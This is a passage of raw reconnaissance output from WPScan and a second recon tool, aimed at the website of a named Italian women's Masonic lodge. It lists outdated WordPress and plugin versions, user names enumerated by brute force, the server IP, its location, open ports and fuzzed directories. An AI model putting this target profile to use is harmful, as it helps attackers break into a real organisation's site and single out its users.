  3408. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/js/bootstrap.min.js?ver=4.1.9
  3409. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/js/modernizr.js?ver=4.1.9
  3410. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/js/masonry.pkgd.min.js?ver=4.1.9
  3411. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/js/owl.carousel.min.js?ver=4.1.9
  3412. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/js/responsive-calendar.min.js?ver=4.1.9
  3413. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/js/jquery.raty.min.js?ver=4.1.9
  3414. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/js/chosen.jquery.min.js?ver=4.1.9
  3415. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/js/instafeed.min.js?ver=4.1.9
  3416. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/js/jquery.mixitup.js?ver=4.1.9
  3417. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/jackbox/js/jackbox-packed.min.js?ver=4.1.9
  3418. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/js/jflickrfeed.min.js?ver=4.1.9
  3419. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/js/zoomsl-3.0.min.js?ver=4.1.9
  3420. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/js/colorpicker.js?ver=4.1.9
  3421. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/js/main-script.js?ver=4.1.9
  3422. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/video-js/video.js?ver=4.1.9
  3423.  
  3424. [+] WordPress theme in use: candidate-child
  3425. | Location: http://www.granloggiafemminile.it/wp-content/themes/candidate-child/
  3426. | Style URL: http://www.granloggiafemminile.it/wp-content/themes/candidate-child/style.css?ver=4.1.9
  3427. | Style Name: Candidate Child
  3428. | Style URI: http://velikorodnov.com/themeforest/preview/?theme=Candidate
  3429. | Description: Candidate Child Theme...
  3430. | Author: Luca Campanale
  3431. | Author URI: http://themeforest.net/item/candidate-politicalnonprofit-wordpress-theme/10051778
  3432. |
  3433. | Detected By: Css Style (Passive Detection)
  3434. |
  3435. | Version: 1.0.9 (80% confidence)
  3436. | Detected By: Style (Passive Detection)
  3437. | - http://www.granloggiafemminile.it/wp-content/themes/candidate-child/style.css?ver=4.1.9, Match: 'Version: 1.0.9'
  3438. |
  3439. | Parent Theme(s):
  3440. |
  3441. | Location: http://www.granloggiafemminile.it/wp-content/themes/alpha-shopper/
  3442. | Style URL: http://fonts.googleapis.com/css?family=Sanchez
  3443. |
  3444. | Detected By: Parent Themes (Passive Detection)
  3445. |
  3446. | The version could not be determined.
  3447.  
  3448. [+] Enumerating Users (via Passive and Aggressive Methods)
  3449. Brute Forcing Author IDs - Time: 00:00:44 <==> (10 / 10) 100.00% Time: 00:00:44
  3450.  
  3451. [i] User(s) Identified:
  3452.  
  3453. [+] alladv
  3454. | Detected By: Author Posts - Author Pattern (Passive Detection)
  3455.  
  3456. [+] Monica
  3457. | Detected By: Rss Generator (Passive Detection)
  3458. | Confirmed By: Rss Generator (Aggressive Detection)
  3459.  
  3460. [!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
  3461. [!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/register.
  3462.  
  3463. [+] Finished: Wed Sep 25 10:56:28 2019
  3464. [+] Requests Done: 48
  3465. [+] Cached Requests: 23
  3466. [+] Data Sent: 17.095 KB
  3467. [+] Data Received: 848.791 KB
  3468. [+] Memory used: 106.742 MB
  3469. [+] Elapsed time: 00:01:53
  3470. #######################################################################################################################################
  3471. [+] URL: http://www.granloggiafemminile.it/
  3472. [+] Started: Wed Sep 25 10:54:29 2019
  3473.  
  3474. Interesting Finding(s):
  3475.  
  3476. [+] http://www.granloggiafemminile.it/
  3477. | Interesting Entries:
  3478. | - Server: nginx/1.6.2
  3479. | - X-Powered-By: PHP/5.4.45-0+deb7u9
  3480. | Found By: Headers (Passive Detection)
  3481. | Confidence: 100%
  3482.  
  3483. [+] http://www.granloggiafemminile.it/xmlrpc.php
  3484. | Found By: Headers (Passive Detection)
  3485. | Confidence: 60%
  3486. | Confirmed By: Link Tag (Passive Detection), 30% confidence
  3487. | References:
  3488. | - http://codex.wordpress.org/XML-RPC_Pingback_API
  3489. | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
  3490. | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
  3491. | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
  3492. | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
  3493.  
  3494. [+] http://www.granloggiafemminile.it/readme.html
  3495. | Found By: Direct Access (Aggressive Detection)
  3496. | Confidence: 100%
  3497.  
  3498. [+] http://www.granloggiafemminile.it/wp-cron.php
  3499. | Found By: Direct Access (Aggressive Detection)
  3500. | Confidence: 60%
  3501. | References:
  3502. | - https://www.iplocation.net/defend-wordpress-from-ddos
  3503. | - https://github.com/wpscanteam/wpscan/issues/1299
  3504.  
  3505. [+] WordPress version 4.1.9 identified (Insecure, released on 2016-01-06).
  3506. | Detected By: Most Common Wp Includes Query Parameter In Homepage (Passive Detection)
  3507. | - http://www.granloggiafemminile.it/wp-includes/js/comment-reply.min.js?ver=4.1.9
  3508. | Confirmed By: Plugin And Theme Query Parameter In Homepage (Passive Detection)
  3509. | - http://www.granloggiafemminile.it/wp-content/themes/candidate-child/style.css?ver=4.1.9
  3510. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/css/bootstrap.min.css?ver=4.1.9
  3511. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/css/fontello.css?ver=4.1.9
  3512. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/css/flexslider.css?ver=4.1.9
  3513. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/css/owl.carousel.css?ver=4.1.9
  3514. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/css/responsive-calendar.css?ver=4.1.9
  3515. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/css/chosen.css?ver=4.1.9
  3516. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/jackbox/css/jackbox.min.css?ver=4.1.9
  3517. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/css/cloud-zoom.css?ver=4.1.9
  3518. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/css/colorpicker.css?ver=4.1.9
  3519. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/video-js/video-js.css?ver=4.1.9
  3520. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/css/style1.css?ver=4.1.9
  3521. | - http://www.granloggiafemminile.it/wp-content/plugins/revslider/rs-plugin/css/settings.css?rev=4.6.0&ver=4.1.9
  3522. | - http://www.granloggiafemminile.it/wp-content/plugins/universefunder/css/footable.core.css?ver=4.1.9
  3523. | - http://www.granloggiafemminile.it/wp-content/plugins/universefunder/css/bootstrap.css?ver=4.1.9
  3524. | - http://www.granloggiafemminile.it/wp-content/plugins/universefunder/css/mystyle.css?ver=4.1.9
  3525. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/style.css?ver=4.1.9
  3526. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/js/jquery.queryloader2.min.js?ver=4.1.9
  3527. | - http://www.granloggiafemminile.it/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.tools.min.js?rev=4.6.0&ver=4.1.9
  3528. | - http://www.granloggiafemminile.it/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.revolution.min.js?rev=4.6.0&ver=4.1.9
  3529. | - http://www.granloggiafemminile.it/wp-content/plugins/universefunder/js/jquery.validate.js?ver=4.1.9
  3530. | - http://www.granloggiafemminile.it/wp-content/plugins/universefunder/js/footable.js?ver=4.1.9
  3531. | - http://www.granloggiafemminile.it/wp-content/plugins/universefunder/js/footable.sort.js?ver=4.1.9
  3532. | - http://www.granloggiafemminile.it/wp-content/plugins/universefunder/js/footable.paginate.js?ver=4.1.9
  3533. | - http://www.granloggiafemminile.it/wp-content/plugins/universefunder/js/footable.filter.js?ver=4.1.9
  3534. | - http://www.granloggiafemminile.it/wp-content/plugins/universefunder/js/chosen.jquery.js?ver=4.1.9
  3535. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/js/bootstrap.min.js?ver=4.1.9
  3536. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/js/modernizr.js?ver=4.1.9
  3537. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/js/masonry.pkgd.min.js?ver=4.1.9
  3538. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/js/owl.carousel.min.js?ver=4.1.9
  3539. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/js/responsive-calendar.min.js?ver=4.1.9
  3540. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/js/jquery.raty.min.js?ver=4.1.9
  3541. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/js/chosen.jquery.min.js?ver=4.1.9
  3542. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/js/instafeed.min.js?ver=4.1.9
  3543. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/js/jquery.mixitup.js?ver=4.1.9
  3544. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/jackbox/js/jackbox-packed.min.js?ver=4.1.9
  3545. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/js/jflickrfeed.min.js?ver=4.1.9
  3546. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/js/zoomsl-3.0.min.js?ver=4.1.9
  3547. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/js/colorpicker.js?ver=4.1.9
  3548. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/js/main-script.js?ver=4.1.9
  3549. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/video-js/video.js?ver=4.1.9
  3550.  
  3551. [+] WordPress theme in use: candidate-child
  3552. | Location: http://www.granloggiafemminile.it/wp-content/themes/candidate-child/
  3553. | Style URL: http://www.granloggiafemminile.it/wp-content/themes/candidate-child/style.css?ver=4.1.9
  3554. | Style Name: Candidate Child
  3555. | Style URI: http://velikorodnov.com/themeforest/preview/?theme=Candidate
  3556. | Description: Candidate Child Theme...
  3557. | Author: Luca Campanale
  3558. | Author URI: http://themeforest.net/item/candidate-politicalnonprofit-wordpress-theme/10051778
  3559. |
  3560. | Detected By: Css Style (Passive Detection)
  3561. |
  3562. | Version: 1.0.9 (80% confidence)
  3563. | Detected By: Style (Passive Detection)
  3564. | - http://www.granloggiafemminile.it/wp-content/themes/candidate-child/style.css?ver=4.1.9, Match: 'Version: 1.0.9'
  3565. |
  3566. | Parent Theme(s):
  3567. |
  3568. | Location: http://www.granloggiafemminile.it/wp-content/themes/alpha-shopper/
  3569. | Style URL: http://fonts.googleapis.com/css?family=Sanchez
  3570. |
  3571. | Detected By: Parent Themes (Passive Detection)
  3572. |
  3573. | The version could not be determined.
  3574.  
  3575. [+] Enumerating All Plugins (via Passive Methods)
  3576. [+] Checking Plugin Versions (via Passive and Aggressive Methods)
  3577.  
  3578. [i] Plugin(s) Identified:
  3579.  
  3580. [+] creare-eu-cookie-law-banner
  3581. | Location: http://www.granloggiafemminile.it/wp-content/plugins/creare-eu-cookie-law-banner/
  3582. | Latest Version: 0.1 (up to date)
  3583. | Last Updated: 2015-06-30T07:46:00.000Z
  3584. |
  3585. | Detected By: Urls In Homepage (Passive Detection)
  3586. |
  3587. | Version: 0.1 (100% confidence)
  3588. | Detected By: Readme - Stable Tag (Aggressive Detection)
  3589. | - http://www.granloggiafemminile.it/wp-content/plugins/creare-eu-cookie-law-banner/readme.txt
  3590. | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
  3591. | - http://www.granloggiafemminile.it/wp-content/plugins/creare-eu-cookie-law-banner/readme.txt
  3592.  
  3593. [+] dhvc-form
  3594. | Location: http://www.granloggiafemminile.it/wp-content/plugins/dhvc-form/
  3595. |
  3596. | Detected By: Urls In Homepage (Passive Detection)
  3597. |
  3598. | The version could not be determined.
  3599.  
  3600. [+] js_composer
  3601. | Location: http://www.granloggiafemminile.it/wp-content/plugins/js_composer/
  3602. |
  3603. | Detected By: Urls In Homepage (Passive Detection)
  3604. | Confirmed By:
  3605. | Meta Generator (Passive Detection)
  3606. | Body Tag (Passive Detection)
  3607. |
  3608. | Version: 4.4.2 (60% confidence)
  3609. | Detected By: Body Tag (Passive Detection)
  3610. | - http://www.granloggiafemminile.it/, Match: 'js-comp-ver-4.4.2'
  3611.  
  3612. [+] revslider
  3613. | Location: http://www.granloggiafemminile.it/wp-content/plugins/revslider/
  3614. |
  3615. | Detected By: Urls In Homepage (Passive Detection)
  3616. | Confirmed By: Comment (Passive Detection)
  3617. |
  3618. | Version: 4.6.0 (100% confidence)
  3619. | Detected By: Comment (Passive Detection)
  3620. | - http://www.granloggiafemminile.it/, Match: 'START REVOLUTION SLIDER 4.6.0'
  3621. | Confirmed By: Release Log (Aggressive Detection)
  3622. | - http://www.granloggiafemminile.it/wp-content/plugins/revslider/release_log.html, Match: 'Version 4.6 SkyWood (25th August 2014)'
  3623.  
  3624. [+] the-events-calendar
  3625. | Location: http://www.granloggiafemminile.it/wp-content/plugins/the-events-calendar/
  3626. | Last Updated: 2019-09-04T18:39:00.000Z
  3627. | [!] The version is out of date, the latest version is 4.9.8
  3628. |
  3629. | Detected By: Urls In Homepage (Passive Detection)
  3630. |
  3631. | Version: 3.9.2 (80% confidence)
  3632. | Detected By: Readme - Stable Tag (Aggressive Detection)
  3633. | - http://www.granloggiafemminile.it/wp-content/plugins/the-events-calendar/readme.txt
  3634.  
  3635. [+] universefunder
  3636. | Location: http://www.granloggiafemminile.it/wp-content/plugins/universefunder/
  3637. |
  3638. | Detected By: Urls In Homepage (Passive Detection)
  3639. |
  3640. | The version could not be determined.
  3641.  
  3642. [+] w3-total-cache
  3643. | Location: http://www.granloggiafemminile.it/wp-content/plugins/w3-total-cache/
  3644. | Last Updated: 2019-09-11T19:03:00.000Z
  3645. | [!] The version is out of date, the latest version is 0.10.1
  3646. |
  3647. | Detected By: Comment Debug Info (Passive Detection)
  3648. |
  3649. | Version: 0.9.4.1 (100% confidence)
  3650. | Detected By: Readme - Stable Tag (Aggressive Detection)
  3651. | - http://www.granloggiafemminile.it/wp-content/plugins/w3-total-cache/readme.txt
  3652. | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
  3653. | - http://www.granloggiafemminile.it/wp-content/plugins/w3-total-cache/readme.txt
  3654.  
  3655. [+] woocommerce
  3656. | Location: http://www.granloggiafemminile.it/wp-content/plugins/woocommerce/
  3657. | Last Updated: 2019-08-12T13:44:00.000Z
  3658. | [!] The version is out of date, the latest version is 3.7.0
  3659. |
  3660. | Detected By: Urls In Homepage (Passive Detection)
  3661. |
  3662. | Version: 2.3.8 (100% confidence)
  3663. | Detected By: Query Parameter (Passive Detection)
  3664. | - http://www.granloggiafemminile.it/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=2.3.8
  3665. | - http://www.granloggiafemminile.it/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=2.3.8
  3666. | - http://www.granloggiafemminile.it/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=2.3.8
  3667. | Confirmed By:
  3668. | Readme - Stable Tag (Aggressive Detection)
  3669. | - http://www.granloggiafemminile.it/wp-content/plugins/woocommerce/readme.txt
  3670. | Readme - ChangeLog Section (Aggressive Detection)
  3671. | - http://www.granloggiafemminile.it/wp-content/plugins/woocommerce/readme.txt
  3672.  
  3673. [+] wordfence
  3674. | Location: http://www.granloggiafemminile.it/wp-content/plugins/wordfence/
  3675. | Last Updated: 2019-08-22T15:25:00.000Z
  3676. | [!] The version is out of date, the latest version is 7.4.0
  3677. |
  3678. | Detected By: Javascript Var (Passive Detection)
  3679. |
  3680. | Version: 6.0.15 (100% confidence)
  3681. | Detected By: Readme - Stable Tag (Aggressive Detection)
  3682. | - http://www.granloggiafemminile.it/wp-content/plugins/wordfence/readme.txt
  3683. | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
  3684. | - http://www.granloggiafemminile.it/wp-content/plugins/wordfence/readme.txt
  3685.  
  3686. [+] Enumerating Config Backups (via Passive and Aggressive Methods)
  3687. Checking Config Backups - Time: 00:00:15 <=============> (21 / 21) 100.00% Time: 00:00:15
  3688.  
  3689. [i] No Config Backups Found.
  3690.  
  3691. [!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
  3692. [!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/register.
  3693.  
  3694. [+] Finished: Wed Sep 25 10:56:45 2019
  3695. [+] Requests Done: 94
  3696. [+] Cached Requests: 6
  3697. [+] Data Sent: 30.627 KB
  3698. [+] Data Received: 773.732 KB
  3699. [+] Memory used: 131.273 MB
  3700. [+] Elapsed time: 00:02:15
  3701. ######################################################################################################################################
  3702. [+] URL: http://www.granloggiafemminile.it/
  3703. [+] Started: Wed Sep 25 10:58:22 2019
  3704.  
  3705. Interesting Finding(s):
  3706.  
  3707. [+] http://www.granloggiafemminile.it/
  3708. | Interesting Entries:
  3709. | - Server: nginx/1.6.2
  3710. | - X-Powered-By: PHP/5.4.45-0+deb7u9
  3711. | Found By: Headers (Passive Detection)
  3712. | Confidence: 100%
  3713.  
  3714. [+] http://www.granloggiafemminile.it/xmlrpc.php
  3715. | Found By: Headers (Passive Detection)
  3716. | Confidence: 60%
  3717. | Confirmed By: Link Tag (Passive Detection), 30% confidence
  3718. | References:
  3719. | - http://codex.wordpress.org/XML-RPC_Pingback_API
  3720. | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
  3721. | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
  3722. | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
  3723. | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
  3724.  
  3725. [+] http://www.granloggiafemminile.it/readme.html
  3726. | Found By: Direct Access (Aggressive Detection)
  3727. | Confidence: 100%
  3728.  
  3729. [+] http://www.granloggiafemminile.it/wp-cron.php
  3730. | Found By: Direct Access (Aggressive Detection)
  3731. | Confidence: 60%
  3732. | References:
  3733. | - https://www.iplocation.net/defend-wordpress-from-ddos
  3734. | - https://github.com/wpscanteam/wpscan/issues/1299
  3735.  
  3736. [+] WordPress version 4.1.9 identified (Insecure, released on 2016-01-06).
  3737. | Detected By: Most Common Wp Includes Query Parameter In Homepage (Passive Detection)
  3738. | - http://www.granloggiafemminile.it/wp-includes/js/comment-reply.min.js?ver=4.1.9
  3739. | Confirmed By: Plugin And Theme Query Parameter In Homepage (Passive Detection)
  3740. | - http://www.granloggiafemminile.it/wp-content/themes/candidate-child/style.css?ver=4.1.9
  3741. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/css/bootstrap.min.css?ver=4.1.9
  3742. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/css/fontello.css?ver=4.1.9
  3743. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/css/flexslider.css?ver=4.1.9
  3744. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/css/owl.carousel.css?ver=4.1.9
  3745. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/css/responsive-calendar.css?ver=4.1.9
  3746. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/css/chosen.css?ver=4.1.9
  3747. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/jackbox/css/jackbox.min.css?ver=4.1.9
  3748. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/css/cloud-zoom.css?ver=4.1.9
  3749. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/css/colorpicker.css?ver=4.1.9
  3750. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/video-js/video-js.css?ver=4.1.9
  3751. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/css/style1.css?ver=4.1.9
  3752. | - http://www.granloggiafemminile.it/wp-content/plugins/revslider/rs-plugin/css/settings.css?rev=4.6.0&ver=4.1.9
  3753. | - http://www.granloggiafemminile.it/wp-content/plugins/universefunder/css/footable.core.css?ver=4.1.9
  3754. | - http://www.granloggiafemminile.it/wp-content/plugins/universefunder/css/bootstrap.css?ver=4.1.9
  3755. | - http://www.granloggiafemminile.it/wp-content/plugins/universefunder/css/mystyle.css?ver=4.1.9
  3756. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/style.css?ver=4.1.9
  3757. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/js/jquery.queryloader2.min.js?ver=4.1.9
  3758. | - http://www.granloggiafemminile.it/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.tools.min.js?rev=4.6.0&ver=4.1.9
  3759. | - http://www.granloggiafemminile.it/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.revolution.min.js?rev=4.6.0&ver=4.1.9
  3760. | - http://www.granloggiafemminile.it/wp-content/plugins/universefunder/js/jquery.validate.js?ver=4.1.9
  3761. | - http://www.granloggiafemminile.it/wp-content/plugins/universefunder/js/footable.js?ver=4.1.9
  3762. | - http://www.granloggiafemminile.it/wp-content/plugins/universefunder/js/footable.sort.js?ver=4.1.9
  3763. | - http://www.granloggiafemminile.it/wp-content/plugins/universefunder/js/footable.paginate.js?ver=4.1.9
  3764. | - http://www.granloggiafemminile.it/wp-content/plugins/universefunder/js/footable.filter.js?ver=4.1.9
  3765. | - http://www.granloggiafemminile.it/wp-content/plugins/universefunder/js/chosen.jquery.js?ver=4.1.9
  3766. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/js/bootstrap.min.js?ver=4.1.9
  3767. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/js/modernizr.js?ver=4.1.9
  3768. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/js/masonry.pkgd.min.js?ver=4.1.9
  3769. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/js/owl.carousel.min.js?ver=4.1.9
  3770. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/js/responsive-calendar.min.js?ver=4.1.9
  3771. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/js/jquery.raty.min.js?ver=4.1.9
  3772. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/js/chosen.jquery.min.js?ver=4.1.9
  3773. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/js/instafeed.min.js?ver=4.1.9
  3774. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/js/jquery.mixitup.js?ver=4.1.9
  3775. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/jackbox/js/jackbox-packed.min.js?ver=4.1.9
  3776. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/js/jflickrfeed.min.js?ver=4.1.9
  3777. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/js/zoomsl-3.0.min.js?ver=4.1.9
  3778. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/js/colorpicker.js?ver=4.1.9
  3779. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/js/main-script.js?ver=4.1.9
  3780. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/video-js/video.js?ver=4.1.9
  3781.  
  3782. [+] WordPress theme in use: candidate-child
  3783. | Location: http://www.granloggiafemminile.it/wp-content/themes/candidate-child/
  3784. | Style URL: http://www.granloggiafemminile.it/wp-content/themes/candidate-child/style.css?ver=4.1.9
  3785. | Style Name: Candidate Child
  3786. | Style URI: http://velikorodnov.com/themeforest/preview/?theme=Candidate
  3787. | Description: Candidate Child Theme...
  3788. | Author: Luca Campanale
  3789. | Author URI: http://themeforest.net/item/candidate-politicalnonprofit-wordpress-theme/10051778
  3790. |
  3791. | Detected By: Css Style (Passive Detection)
  3792. |
  3793. | Version: 1.0.9 (80% confidence)
  3794. | Detected By: Style (Passive Detection)
  3795. | - http://www.granloggiafemminile.it/wp-content/themes/candidate-child/style.css?ver=4.1.9, Match: 'Version: 1.0.9'
  3796. |
  3797. | Parent Theme(s):
  3798. |
  3799. | Location: http://www.granloggiafemminile.it/wp-content/themes/alpha-shopper/
  3800. | Style URL: http://fonts.googleapis.com/css?family=Sanchez
  3801. |
  3802. | Detected By: Parent Themes (Passive Detection)
  3803. |
  3804. | The version could not be determined.
  3805.  
  3806. [+] Enumerating Users (via Passive and Aggressive Methods)
  3807. Brute Forcing Author IDs - Time: 00:00:10 <============> (10 / 10) 100.00% Time: 00:00:10
  3808.  
  3809. [i] User(s) Identified:
  3810.  
  3811. [+] alladv
  3812. | Detected By: Author Posts - Author Pattern (Passive Detection)
  3813.  
  3814. [+] Monica
  3815. | Detected By: Rss Generator (Passive Detection)
  3816. | Confirmed By: Rss Generator (Aggressive Detection)
  3817.  
  3818. [!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
  3819. [!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/register.
  3820.  
  3821. [+] Finished: Wed Sep 25 10:58:49 2019
  3822. [+] Requests Done: 15
  3823. [+] Cached Requests: 56
  3824. [+] Data Sent: 4.809 KB
  3825. [+] Data Received: 131.922 KB
  3826. [+] Memory used: 107.113 MB
  3827. [+] Elapsed time: 00:00:26
  3828. ######################################################################################################################################
  3829. [INFO] ------TARGET info------
  3830. [*] TARGET: http://www.granloggiafemminile.it/
  3831. Usage: grep [OPTION]... PATTERNS [FILE]...
  3832. Exécutez « grep --help » pour obtenir des renseignements complémentaires.
  3833. [ALERT] Problem with IP-API detected... trying to reconnect with 15 seconds timeout. Number of tries: 1/6
  3834. [*] TARGET IP: 77.238.18.215
  3835. [INFO] NO load balancer detected for www.granloggiafemminile.it...
  3836. [*] DNS servers: granloggiafemminile.it.
  3837. [*] TARGET server: nginx/1.6.2
  3838. [*] CC: IT
  3839. [*] Country: Italy
  3840. [*] RegionCode: 21
  3841. [*] RegionName: Piedmont
  3842. [*] City: Turin
  3843. [*] ASN: AS20746
  3844. [*] BGP_PREFIX: 77.238.16.0/21
  3845. [*] ISP: ASN-IDC Telecom Italia S.p.A., IT
  3846. [INFO] DNS enumeration:
  3847. [INFO] Possible abuse mails are:
  3848. [*] abuse@granloggiafemminile.it
  3849. [*] abuse-ripe@telecomitalia.it
  3850. [*] abuse@www.granloggiafemminile.it
  3851. [INFO] NO PAC (Proxy Auto Configuration) file FOUND
  3852. [INFO] Starting FUZZing in http://www.granloggiafemminile.it/FUzZzZzZzZz...
  3853. [INFO] Status code Folders
  3854. [*] 200 http://www.granloggiafemminile.it/images
  3855. [ALERT] Look in the source code. It may contain passwords
  3856. [INFO] Links found from http://www.granloggiafemminile.it/ http://77.238.18.215/:
  3857. [*] http://www.granloggiafemminile.it/
  3858. [*] http://www.granloggiafemminile.it/attivita-estere/climaf
  3859. [*] http://www.granloggiafemminile.it/attivita-estere/clipsas
  3860. [*] http://www.granloggiafemminile.it/attivita-estere/umm
  3861. [*] http://www.granloggiafemminile.it/author/alladv
  3862. [*] http://www.granloggiafemminile.it/calendario-eventi/?ical=1
  3863. [*] http://www.granloggiafemminile.it/category/notizie
  3864. [*] http://www.granloggiafemminile.it/comments/feed
  3865. [*] http://www.granloggiafemminile.it/contatti
  3866. [*] http://www.granloggiafemminile.it/evento/lurlo-silenzioso-la-violenza-di-genere
  3867. [*] http://www.granloggiafemminile.it/feed
  3868. [*] http://www.granloggiafemminile.it/glossario
  3869. [*] http://www.granloggiafemminile.it/il-nostro-calendario-eventi
  3870. [*] http://www.granloggiafemminile.it/informativa-sui-cookie
  3871. [*] http://www.granloggiafemminile.it/i-nostri-principi
  3872. [*] http://www.granloggiafemminile.it/le-logge
  3873. [*] http://www.granloggiafemminile.it/notizie/conferenza-di-vincenzo-gallucci-roma-25-maggio-2019
  3874. [*] http://www.granloggiafemminile.it/notizie/glmfi-chiusura-del-convento-annuale-firenze-19-10-19
  3875. [*] http://www.granloggiafemminile.it/notizie/in-evidenza/la-loggia-femminile-anita-garibaldi-al-grande-oriente-ditalia-firenze-4-10-2019
  3876. [*] http://www.granloggiafemminile.it/notizie/lurlo-silenzioso-la-violenza-di-genere-ferrara-12-10-2019
  3877. [*] http://www.granloggiafemminile.it/storia/allocuzioni
  3878. [*] http://www.granloggiafemminile.it/storia/la-storia-glmfi
  3879. [*] http://www.granloggiafemminile.it/storia/le-gm
  3880. [INFO] Shodan detected the following opened ports on 77.238.18.215:
  3881. [*] 21
  3882. [*] 214
  3883. [*] 22
  3884. [*] 25
  3885. [*] 3
  3886. [*] 443
  3887. [*] 8
  3888. [*] 80
  3889. [INFO] ------VirusTotal SECTION------
  3890. [INFO] VirusTotal passive DNS only stores address records. The following domains resolved to the given IP address:
  3891. [INFO] Latest URLs hosted in this IP address detected by at least one URL scanner or malicious URL dataset:
  3892. [INFO] Latest files that are not detected by any antivirus solution and were downloaded by VirusTotal from the IP address provided:
  3893. [INFO] ------Alexa Rank SECTION------
  3894. [INFO] Percent of Visitors Rank in Country:
  3895. [INFO] Percent of Search Traffic:
  3896. [INFO] Percent of Unique Visits:
  3897. [INFO] Total Sites Linking In:
  3898. [*] Total Sites
  3899. [INFO] Useful links related to www.granloggiafemminile.it - 77.238.18.215:
  3900. [*] https://www.virustotal.com/pt/ip-address/77.238.18.215/information/
  3901. [*] https://www.hybrid-analysis.com/search?host=77.238.18.215
  3902. [*] https://www.shodan.io/host/77.238.18.215
  3903. [*] https://www.senderbase.org/lookup/?search_string=77.238.18.215
  3904. [*] https://www.alienvault.com/open-threat-exchange/ip/77.238.18.215
  3905. [*] http://pastebin.com/search?q=77.238.18.215
  3906. [*] http://urlquery.net/search.php?q=77.238.18.215
